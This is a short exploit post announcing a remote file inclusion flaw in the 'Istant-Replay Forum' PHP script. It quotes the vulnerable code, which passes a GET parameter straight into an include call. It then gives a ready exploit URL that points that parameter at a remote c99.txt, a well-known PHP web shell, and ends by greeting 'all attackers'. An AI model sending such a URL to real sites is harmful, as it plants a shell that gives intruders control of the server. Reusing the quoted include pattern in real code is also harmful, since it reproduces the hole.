remote file include

#########################################################################
Istant-Replay Forum Remote File Inclusion Vulnerability
#########################################################################

AUTHOR: THuGM4N

Email : [email protected]

Script : Istant-Replay Forum

Site : http://www.chattaitaliano.com

Vulnerable CODE :

$a = $_GET['data'];
$b = $_GET['post'];

$foo = include "$a.txt";

BUT THE EXPLOIT IS LIKE THAT :

http://[localhost]/[forum]/read.php?data=http://127.0.0.1/c99.txt?

BIGUP 2 All Attackers Around The World .

#########################################################################
Istant-Replay Forum Remote File Inclusion Vulnerability
#########################################################################